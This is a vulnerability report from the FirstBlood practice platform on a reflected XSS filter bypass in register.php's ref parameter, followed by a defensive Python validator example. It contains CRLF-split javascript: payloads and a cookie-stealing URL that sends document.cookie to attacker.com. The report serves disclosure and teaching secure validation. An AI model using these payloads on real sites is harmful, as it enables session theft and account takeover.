FirstBlood #368: Reflected XSS on register.php through the ref parameter [Bypass]
This issue was discovered on FirstBlood v2



On 2021-10-25, holybugx Level 5 reported:

Description

Hello Sean,

Reflected XSS is possible on the /register.php endpoint through the ref parameter. This is a bypass to the previous report. As the fix was not properly implemented, I was able to once again achieve XSS on this endpoint which results in a one-click account takeover.

Steps To Reproduce

  • Open the following URL and click on Return to previous page, the XSS executes:

https://firstbloodhackers.com/register.php?ref=j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:confirm`1`

As observed, the mentioned payload bypasses the implemented mitigation.

Filter Bypassing

The developer tried to filter various special characters, e.g. < " >, as well as filtering the java keyword to prevent javascript: scheme XSS payloads.

The developer did a great job in this manner, as the keywords are properly swapped with the nope keyword, making the following payload fail:

However, the checks only work when the java keyword exists. Using Carriage Return Line Feed characters, I was able to break the filter:

j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:confirm`1`

The above payload is valid and results in a bypass to the filtering used by the developer.

Exploitation

An attacker can craft a payload to steal the victim's cookies, and to take over their accounts:

https://firstbloodhackers.com/register.php?ref=j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:window.location.href=`http://attacker.com/${document.cookie}`

Where http://attacker.com is the attacker's server. Opening the above link and clicking Return to previous page results in a redirection to the attacker-controlled server, and the cookies are sent along as well.

  • This is how an attacker receives the requests and the victim's cookies:

An attacker can use the cookies to take over various users' accounts, including the drAdmin account.

Impact

  • XSS leading to one-click account takeover of various users and admins.

Remediation

  • Implement proper sanitization on the ref parameter.
  • Set HttpOnly cookies so that JavaScript cannot access the cookies.
  • Remove/expire the drps cookies after logging out.

Kind Regards,

HolyBugx

P3 Medium

Endpoint: /register.php

Parameter: ref

Payload: j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:confirm`1`


FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The ?ref parameter on register.php was poorly fixed and can be bypassed in various ways. Firstly, the developer failed to use strtolower() when comparing strings, and characters such as %09 will also bypass the filter.
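As an added illustration (not code from the report or from the FirstBlood application), the Python below reconstructs the filter behaviour the report and the note above describe and contrasts it with a scheme-allowlisting validator for the ref value. The weak filter is an assumption built from the report's description (the java keyword swapped for nope, the characters < " > stripped, no lowercasing); the allowed host name, the fallback path and the function names are assumptions. FirstBlood itself is PHP, so the same logic would be written there with strtolower() and parse_url(). The point it shows: keyword blocklists lose to characters (CR, LF, TAB) that browsers silently drop from a URL scheme, while parsing the value and allowing only same-site http(s) URLs or site-relative paths rejects every variant without needing to know the payload.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample input: the CRLF-split payload from the report (URL-encoded
# as it appears in the ref parameter).
CRLF_PAYLOAD = "j%0D%0Aav%0D%0Aas%0D%0Acrip%0D%0At%0D%0A:confirm`1`"

# Assumed host of the application; only redirects back to this host (or to a
# site-relative path) are accepted.
ALLOWED_HOST = "firstbloodhackers.com"


def weak_filter(ref: str) -> str:
    """Reconstruction (assumption) of the filter the report describes:
    a literal keyword swap plus stripping of a few characters, applied
    case-sensitively and without touching control characters."""
    value = unquote(ref)
    value = value.replace("java", "nope")
    for ch in '<>"':
        value = value.replace(ch, "")
    return value


def browser_normalized(url: str) -> str:
    """Model of what a browser does before resolving a URL: ASCII tab, CR and LF
    are removed wherever they occur (WHATWG URL parsing). This is why the
    CRLF-split payload still ends up as a javascript: URL."""
    return re.sub(r"[\t\r\n]", "", url)


def safe_return_url(ref: str, default: str = "/") -> str:
    """Validator for the 'Return to previous page' target.

    Accepts only a site-relative path or an http(s) URL on ALLOWED_HOST;
    everything else (any scheme, any other host, any control character)
    falls back to `default`. Decision is made on the parsed structure, not
    on keywords, so case tricks and CRLF/TAB splitting do not matter.
    """
    value = unquote(ref)

    # Reject every ASCII control character outright (CR, LF, TAB, NUL, DEL):
    # a legitimate redirect target never contains one, and allowing any of
    # them lets a browser reassemble a scheme the filter never saw.
    if re.search(r"[\x00-\x1f\x7f]", value):
        return default

    parts = urlsplit(value)
    scheme = parts.scheme.lower()  # urlsplit already lowercases; kept explicit

    if scheme == "":
        # No scheme: allow a site-relative path, but not a protocol-relative
        # "//other-host/..." which would still leave the site.
        if value.startswith("/") and not value.startswith("//"):
            return value
        return default

    if scheme in ("http", "https") and parts.hostname == ALLOWED_HOST:
        return value

    return default


if __name__ == "__main__":
    for sample in ["javascript:confirm`1`", CRLF_PAYLOAD, "JavaScript:confirm`1`",
                   "%09javascript:confirm`1`", "//attacker.example/", "/login.php"]:
        print(f"{sample!r:55} weak -> {browser_normalized(weak_filter(sample))!r:35} "
              f"safe -> {safe_return_url(sample)!r}")
```

Running the block prints, for each constructed sample, what the weak filter leaves behind once a browser has normalized it, next to what the allowlisting validator returns; the javascript: scheme survives the weak filter in the CRLF, mixed-case and %09 variants, while safe_return_url returns the fallback path for all of them and passes only the same-site inputs through.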